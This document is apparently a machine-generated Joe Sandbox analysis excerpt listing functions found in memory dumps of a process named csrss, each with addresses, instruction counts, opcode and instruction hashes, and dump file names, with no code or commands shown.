Opcode ID: 61bd4c46a3b4ca5969a8b01ac99b9def5a66e3bb318c7f5872f5dc99fbe5aef0
Instruction ID: 64c3623df0ab849a4a98d5f5aba4973935cf73140c1f6c1f92f33dc86ad79ce6
Opcode Fuzzy Hash: 61bd4c46a3b4ca5969a8b01ac99b9def5a66e3bb318c7f5872f5dc99fbe5aef0
Instruction Fuzzy Hash: 49312830D9A64BCFEB9ADB5484556BE77B5FF46300F50807BF00EE2181DA38E9489B81

Function 00007FFAAC5DB716 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8e3ae29c92c2b2e72d58a504d6a5991e8314de3d029383be59dacf9a5518cf
Instruction ID: 12ec97f57f1f0f1edbe5249cbdda4f218d1816eb45b410f623de43bfadc2c224
Opcode Fuzzy Hash: da8e3ae29c92c2b2e72d58a504d6a5991e8314de3d029383be59dacf9a5518cf
Instruction Fuzzy Hash: A9214F5294EB8A4FF796D338A859BB46F81DF56210F0441FBE04DCB297DC08984943D1

Function 00007FFAAC5D4631 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9f4cdf1ca4965482ac6523e95fe54fc1714d76a5a3e73e5141741c59333725
Instruction ID: e6d2f2f3f02f5437acb404751023b0293c45edef2117eccea0a325196dca2a3f
Opcode Fuzzy Hash: 7b9f4cdf1ca4965482ac6523e95fe54fc1714d76a5a3e73e5141741c59333725
Instruction Fuzzy Hash: 4F31E41085E6D7CAF71BC71848606B57B55EF5320171886F7E08B8B4D7DA1CE849C7C1

Function 00007FFAAC5D9560 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1d7480387aa610d1c0353c8ab1c7959644a5a39abf06f5c407f7fa53ec9a229
Instruction ID: 485c0c2472a3171a882c08abeaff74b65c7fd2f3881bbb880bf6534495d35554
Opcode Fuzzy Hash: a1d7480387aa610d1c0353c8ab1c7959644a5a39abf06f5c407f7fa53ec9a229
Instruction Fuzzy Hash: FD31F65096E6978AF72BC71484646B47B55EF5331071886BBF08F8B1C7EC2CE848C381

Function 00007FFAAC4D0950 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 635cd85dd7189160f1826ee148f6197e8f5885fcc6955b0b16cf44d1ce85757a
Instruction ID: beaf5358ef9138e7269acbf2b03377f434870359ace6514ff2aece08b3c50fb5
Opcode Fuzzy Hash: 635cd85dd7189160f1826ee148f6197e8f5885fcc6955b0b16cf44d1ce85757a
Instruction Fuzzy Hash: 1C31FE2081D596CBF716E71484646B47F51EF63314B1886FBC49E8B58BC42CF485C7C5

Function 00007FFAAC5D7CF0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040dd48e831a30e911eb9cf00af2030bf72ddfd9a61e96b1097558a17ee63448
Instruction ID: 31ff7d85e0fdbf18a8e97005fb6dd13e64c82f0498b243a09ebb2466f0b80ad4
Opcode Fuzzy Hash: 040dd48e831a30e911eb9cf00af2030bf72ddfd9a61e96b1097558a17ee63448
Instruction Fuzzy Hash: 7F21915194F7C7CFF3279B3418242B46FE45F4315171985FBE08D8A4DBD908984A83D2

Function 00007FFAAC5D5E15 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8281490358b6d6f0a2b213ea76b92ba87ca5bddd5de3b9d1316adc66952d14c1
Instruction ID: 3a7f1a621231d0028cf45b9bda82a6fe87c7e04a854f056b1cb73a7874d9d734
Opcode Fuzzy Hash: 8281490358b6d6f0a2b213ea76b92ba87ca5bddd5de3b9d1316adc66952d14c1
Instruction Fuzzy Hash: 3B216D7595DA4EDFEF85EB58D4906FDBBB1FF49300F4041BAE00EE3281DA20A9458B80

Function 00007FFAAC5D0F08 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8749e9ff043cfa9f905dd7c8c2d57828b179b7e8f1f91f339484a40f6ea7b43b
Instruction ID: cbef5bffcfc4900b2a8a80677b9545c771b4e0110d169274ae07eb6d981d7c94
Opcode Fuzzy Hash: 8749e9ff043cfa9f905dd7c8c2d57828b179b7e8f1f91f339484a40f6ea7b43b
Instruction Fuzzy Hash: 66213030D59A4ECFEB95DB58D554AED77F1FF99300F60407AE00EE3291DA24A9058781

Function 00007FFAAC4CF0F0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e881d466a7b8554d382183840ab8648b173377db27faba0408fc3a6939e4ebe
Instruction ID: bdc06d18c23df31340937d229028b4355cfd927e8a75df706824f0ed1e6f9b7c
Opcode Fuzzy Hash: 5e881d466a7b8554d382183840ab8648b173377db27faba0408fc3a6939e4ebe
Instruction Fuzzy Hash: AA213A4195E6C28FF75753B858690756FA09F13228B1885FBD08D8A1A3ED0CAC4AC39A

Function 00007FFAAC5D7909 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6338939a4614efb7818d082c6fa1d1d73dd91895d206f904df3349492d315f
Instruction ID: d2ac779ef5a3fd5a82763abb8f4360caf664dfdce63f537be4c072f5e91e07b3
Opcode Fuzzy Hash: 9b6338939a4614efb7818d082c6fa1d1d73dd91895d206f904df3349492d315f
Instruction Fuzzy Hash: 7D110322A0F78ACFF766D36448456FA3B99EF97340F00417BE04DD7196DD28A90A87D1

Function 00007FFAAC4D0980 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b97fba36edf686dd650152f9be95f45c7ca4fabd2b6648143e3bde91eeec891f
Instruction ID: fd795cda266f734c7980c549859cde2ee9ac20078b7014ef768efa63203fdb74
Opcode Fuzzy Hash: b97fba36edf686dd650152f9be95f45c7ca4fabd2b6648143e3bde91eeec891f
Instruction Fuzzy Hash: B1110D2091E466C7FA69E74484686B47A51EFB2309B14C6F7C44F8B58AC83CF885D7C5

Function 00007FFAAC5D9590 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a1f1a88d008eaf4bbec686ddb57e12b3dcd57276d1d613bf87dab7cea567d4
Instruction ID: b3350919adcc996f9c157a1cd1cebb9633c30ca32f1e0968961dc8eee7ff4bae
Opcode Fuzzy Hash: c9a1f1a88d008eaf4bbec686ddb57e12b3dcd57276d1d613bf87dab7cea567d4
Instruction Fuzzy Hash: D711E75096D527CAFA2AC70880606B47255FF96301B14C677F04F8B58AEC2CF884D3C0

Function 00007FFAAC5D4660 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa475010149b77c172aee87af82bf69651ea44cadebb4766e9d1d4b784c0c5a
Instruction ID: 017aa779286b3b9fa0a3005b36c46d8b54d1d5d424350b25871d5e3194187241
Opcode Fuzzy Hash: 2fa475010149b77c172aee87af82bf69651ea44cadebb4766e9d1d4b784c0c5a
Instruction Fuzzy Hash: DC11C31095E567CAF629C7088464AB57255FF56301B2486B6F04F8B4CACF2CF985DBC0

Function 00007FFAAC5DB4D6 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8f3c3751bae0f3c07dace5ca19c1c6d6ec1417c9d8ccd231a05002e1b30ddc
Instruction ID: 90bfb8d7d814f0575095883feea6851a11726d1e4a820e2876aacee897ddccdb
Opcode Fuzzy Hash: 0b8f3c3751bae0f3c07dace5ca19c1c6d6ec1417c9d8ccd231a05002e1b30ddc
Instruction Fuzzy Hash: 3111B471A5D7868FF756DF3884542357BE5FF16301F0441BAE08DC71A2EE25D8458781

Function 00007FFAAC4CEEBE Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4252d58dea366c2075c6674ecb6e450b8860c4357017daf18ed516fb7ef54d9c
Instruction ID: b285da50650ab34672c6dfbc3a77e9dccc1e04e63463cc57860ee7ef4b448d36
Opcode Fuzzy Hash: 4252d58dea366c2075c6674ecb6e450b8860c4357017daf18ed516fb7ef54d9c
Instruction Fuzzy Hash: E2112C72A0EA898FF716A76858162E8B7E0FF46318F54417AD05EC31D3DE1CA8064788

Function 00007FFAAC5DCE1D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3f7ad50e3515db0449ef7c71e7cdecdd8cd67af7d1cb59be94607202accc5d
Instruction ID: aebd6ed9213416e1d6f56ac456729ac2ee549cc47594fad8fa40c0c64a7bdd00
Opcode Fuzzy Hash: bb3f7ad50e3515db0449ef7c71e7cdecdd8cd67af7d1cb59be94607202accc5d
Instruction Fuzzy Hash: 03014C61A5D78B4BF757D72850112747BC1DB97211B1445BBD08DC21C6CD14A80583C0

Function 00007FFAAC46CAA8 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC46C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac46c000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1eca32c6cddead0df7432ca5e7b1ccd0bd5c401e06ae0fb4e78039438ce1b46
Instruction ID: 6d8b45b475a68611cb2907a82dd8c3cdfea0babf9fc9aa40e461c07c4536b829
Opcode Fuzzy Hash: c1eca32c6cddead0df7432ca5e7b1ccd0bd5c401e06ae0fb4e78039438ce1b46
Instruction Fuzzy Hash: 4901282270DF454FF361D7BC68592B5BBE0EB85165B08467BD48EC258ADD18E88983C4

Function 00007FFAAC5DC005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782ba233fd1f00237e8ec46dc1b2ad19507d49db01f520229499dc1268388304
Instruction ID: c99245c3b0e603856a851d692a7d29ff24fb438fca7f1abeb6a4c4501f118db3
Opcode Fuzzy Hash: 782ba233fd1f00237e8ec46dc1b2ad19507d49db01f520229499dc1268388304
Instruction Fuzzy Hash: 3C11022055E3C64FE70BA73898514B47FA0EF47304B5884FBE49ACA197E81DA89E8391

Function 00007FFAAC4CFA00 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b265df33b85c5903ae279f70b8f8e773470a67a1716f032fe0e12aafb867e719
Instruction ID: 45271fb1555de0321e75a345cdf7073cbdbacbf3eef894167c120757615e5253
Opcode Fuzzy Hash: b265df33b85c5903ae279f70b8f8e773470a67a1716f032fe0e12aafb867e719
Instruction Fuzzy Hash: EA11C420A1DA098FEB55DB2998459FAB791FF54208B40453AD84EC35F2DE29E94983C4

Function 00007FFAAC5D1A8E Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48cb46ec4a5e7f0f92e432464b5782b88dd9247db6afbc8c31209506c4b43118
Instruction ID: a53babeb2779593649a57d8073013cccee6b061ea014466a1acd9363e436be48
Opcode Fuzzy Hash: 48cb46ec4a5e7f0f92e432464b5782b88dd9247db6afbc8c31209506c4b43118
Instruction Fuzzy Hash: 0E111731E5990A8FEB99DB58D455ABD77B1EF59310F4041BAA00EE3291CE34A9808B80

Function 00007FFAAC5D8610 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f29285e0f38d5cdca86366ea75a37883febaa9c63f6f5d52a55d44c16e3b6d8
Instruction ID: 8f381924159be5676f84ceadc70c76113e22fd9b5d831438c5c865bbcc5ee8ce
Opcode Fuzzy Hash: 6f29285e0f38d5cdca86366ea75a37883febaa9c63f6f5d52a55d44c16e3b6d8
Instruction Fuzzy Hash: 48113A2064D94A8FEB55DB25C854AF577E1FF65204B40077AE18EC35E3CD18F40A83C4

Function 00007FFAAC4CF87E Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91bb116f27d75cf177dc606ba3c24f7ef9c01b26da6e1f0a39bcfdd959cbfeda
Instruction ID: 4fadb4f0f75c71d0efad8cd1832e361b6605d6353dd6d936240996192a8fe5a6
Opcode Fuzzy Hash: 91bb116f27d75cf177dc606ba3c24f7ef9c01b26da6e1f0a39bcfdd959cbfeda
Instruction Fuzzy Hash: 1D01493130990A8FFB16CB18D8987F57B91EBA5318F14027AE94DC32E1D669E95487C0

Function 00007FFAAC5D848E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ad964ea77c87993d8fccc1dbce2d61dc25c109b323e6b8207e05b7da9140a05
Instruction ID: aeb39c27058f5b135412123b0f340898402732422213956cddc0ea5b686f772a
Opcode Fuzzy Hash: 0ad964ea77c87993d8fccc1dbce2d61dc25c109b323e6b8207e05b7da9140a05
Instruction Fuzzy Hash: E211663124D64B8FE709CB18D8547F53B81EB62319F14027EEA4DC32E2CA29E525C7C0

Function 00007FFAAC5D6251 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a9cbe41c65c8f0f00cc693752dceaec9a34b7eb3bad6f6fb1a84d5e0ce395b5
Instruction ID: ff2107d1553dc03fb9a2f389edd155ba93a8570c316d923dd3ef55dc77450167
Opcode Fuzzy Hash: 6a9cbe41c65c8f0f00cc693752dceaec9a34b7eb3bad6f6fb1a84d5e0ce395b5
Instruction Fuzzy Hash: 8EF0FC3170CA488FDB9CDB2CA9566FD77C2FF99211B54057FE08EC3662CE2198064381

Function 00007FFAAC4CEE33 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323999ec918a47d8074e45c5a4fc14dd4d61d20d53f15d91f6b5b4a87c8e152f
Instruction ID: 424e3b4e8f621a23dccab368f2bd0226130568a7c405d2afcbac645446bb6e07
Opcode Fuzzy Hash: 323999ec918a47d8074e45c5a4fc14dd4d61d20d53f15d91f6b5b4a87c8e152f
Instruction Fuzzy Hash: 15F01D31B2DD098BA754EA5CD495678B3A1EF497147108279D01ED3686CE24FC0687C5

Function 00007FFAAC5D3560 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e539bce2d40255915ceedb6fa1b88fedd20f8bd3b16eacc18090b588946f3ff
Instruction ID: ffc0bcfc0f8465dc1ea31e98cabc79986c619dd72daf4cd1c64b5ca022771a04
Opcode Fuzzy Hash: 2e539bce2d40255915ceedb6fa1b88fedd20f8bd3b16eacc18090b588946f3ff
Instruction Fuzzy Hash: 5D017D3124D2468FD706CB18E8557F57B90EF52320F1442BFE509C71D2C5559508C7C0

Function 00007FFAAC5D1D62 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e36eee72224f21fc9d873a51d823ce70bad33a10e8466bf95854ed510ca4b53
Instruction ID: 903db080cdeb744955af87343c8878a96ef77265703f0c9d78ba592d818fe3a2
Opcode Fuzzy Hash: 6e36eee72224f21fc9d873a51d823ce70bad33a10e8466bf95854ed510ca4b53
Instruction Fuzzy Hash: 5BF0443188E3C6DFE717DB7088565E63FA8AF43214B1840E7E449860A2C668965AC791

Function 00007FFAAC4CE082 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89b6abfe572400be8478710f7b182e1d26fe7793e6af1d7ddac146c151d2c6fa
Instruction ID: 51f59136ff372818511ad1bc7bd7bc5813bf2372f7cd85c7a63203362e9e8402
Opcode Fuzzy Hash: 89b6abfe572400be8478710f7b182e1d26fe7793e6af1d7ddac146c151d2c6fa
Instruction Fuzzy Hash: 9BF0623185F2C5DFE3139B7088555E97FB4EF43214F1840FAD499870B2CA2D660AC7A2

Function 00007FFAAC4CB96D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bcba466df55d4b58e30d054b79f06fffa058d6c54530fddd82fbcd6e513ecc2
Instruction ID: fe459f61b1e99b61d3d1feb70d366f8ded93e69e492d7ab769f6b684d55615e7
Opcode Fuzzy Hash: 3bcba466df55d4b58e30d054b79f06fffa058d6c54530fddd82fbcd6e513ecc2
Instruction Fuzzy Hash: E0F0F67184D68D9FE70AD76888990EC7FB0EF16200F4480FBD44ECB0A3DD2455598781

Function 00007FFAAC5D85FC Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e06be71a34b5c3e0be2ad0bdb58fcc9dab26c19e7d2eb550dc99ecc82a613b4e
Instruction ID: 9a691aa52c725e1fd921c56dd6d8e06df00e16b8f0a6fc540bf7e9cfa016f2e9
Opcode Fuzzy Hash: e06be71a34b5c3e0be2ad0bdb58fcc9dab26c19e7d2eb550dc99ecc82a613b4e
Instruction Fuzzy Hash: 68F02B3598E593CBEB055B2558087F87B94EF73361B4401BBE5CD8B1D2CA19911AD3C4

Function 00007FFAAC5D6C72 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7792b3020903f51c6bdde2a4cb34f3c425a38fba7c009a6d96176061b861837
Instruction ID: 9641cff9b88a85b41ef8add61deadfacfac12707b293e4bbd2e789fa0409d7bf
Opcode Fuzzy Hash: b7792b3020903f51c6bdde2a4cb34f3c425a38fba7c009a6d96176061b861837
Instruction Fuzzy Hash: 22F0A43548E386DFE712CB7098515993FA4EF53204B0840FAE45986062C92D650AC7A1

Function 00007FFAAC5D8468 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168bbbb9fda6f6b1ecf7ada4538dea6e097bef6629dc50eed28bf3d0c0e436c6
Instruction ID: 5c28bf62784a119c839079a87c5249dcc6a81be76ce82456cdd3dbee3c35440d
Opcode Fuzzy Hash: 168bbbb9fda6f6b1ecf7ada4538dea6e097bef6629dc50eed28bf3d0c0e436c6
Instruction Fuzzy Hash: 0DF0E95058FA47CAF76FC71058113B82B989F1335AF244177E58E834D2C819E50A93C2

Function 00007FFAAC5D796A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8f1b31a8dc07197eeda7d355341dbef8b6dc55eaed3e80815404e8b94df8e12
Instruction ID: bfe0a63e75f48ef800fa7449aaeed41c2fd4967a8f1b526ace85b2433efc4076
Opcode Fuzzy Hash: b8f1b31a8dc07197eeda7d355341dbef8b6dc55eaed3e80815404e8b94df8e12
Instruction Fuzzy Hash: 3DF0961290E3C2CFFB139B644C911A43FA0DF1735070945FAD488CB1D7E668A509D751

Function 00007FFAAC4CF85B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1630536387.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac4cb000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f897eb52f7a9c8a49cf8bc8dd4438b0dbe988f3febbaafee1b9126f072bf2a
Instruction ID: d8ba40531541eea4dd3e90730439aa36294ef2175d145f2ef69cd875e02fad0f
Opcode Fuzzy Hash: 05f897eb52f7a9c8a49cf8bc8dd4438b0dbe988f3febbaafee1b9126f072bf2a
Instruction Fuzzy Hash: BAD0C910A0FA03C7F13B474680A833961A08F0770CEA0C53EE49F418E1CE1DF40A6399

Function 00007FFAAC5D353B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b8f87939aff5b32161169c3911dd2c39f223b3e9ee56dde44a24e6da00aceb1
Instruction ID: 7ed82adf3bc8fdf889234a264c5e8663524a22efcd0ea173c6ba2ceef8693367
Opcode Fuzzy Hash: 8b8f87939aff5b32161169c3911dd2c39f223b3e9ee56dde44a24e6da00aceb1
Instruction Fuzzy Hash: 7BD09254A9FB43C6F16FCB0DC16033A52B95F03701E64C03BE05F418D2C91DF9096281

Function 00007FFAAC5D354E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.1662364156.00007FFAAC5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffaac5d0000_csrss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d21679f816680ea77e0b5279abc3bdb01399de9085e8f30e2507f85e3848db
Instruction ID: 3ffc931d925b1a1f7aa3c13e9f4947dfa134819338ad705f5a0f4b2ce62e37ae
